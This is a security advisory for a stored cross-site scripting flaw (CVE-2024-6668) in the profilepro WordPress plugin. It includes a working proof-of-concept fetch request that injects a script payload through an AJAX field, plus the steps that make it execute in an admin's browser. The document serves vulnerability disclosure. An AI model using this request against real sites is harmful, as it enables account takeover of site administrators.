profilepro <= 1.3 – Subscriber+ Stored Cross Site Scripting | CVE 2024-6668

Description

The plugin does not sanitise and escape some parameters and lacks proper access controls, which could allow users with a role as low as subscriber to perform Cross-Site Scripting attacks

Proof of Concept

Run the following code from the browser console from the subscriber user

```
fetch("../wp-admin/admin-ajax.php", {
  method: "POST",
  headers: {
    "Accept": "*/*",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest"
  },
  body: "title=%22%3E%3Cscript%3Ealert(1339)%3C%2Fscript%3E&label=&meta_key=&placeholder=&help_text=&privacy=1&max_length=&is_required=1&user_edit=1&icon=&type=textarea&action=profilepro_admin_add_custom_field&arg2=89",
  credentials: "include"
})
.then(response => {
  if (!response.ok) {
    throw new Error('Network response was not ok');
  }
  return response.text();
})
.then(data => console.log(data))
.catch(error => console.error('Error:', error));
```

- As an admin, go to http://example.com/wp-admin/edit.php?post_type=profilepro_form 
- Choose the default profile, click on edit and click on add field, XSS will pop up.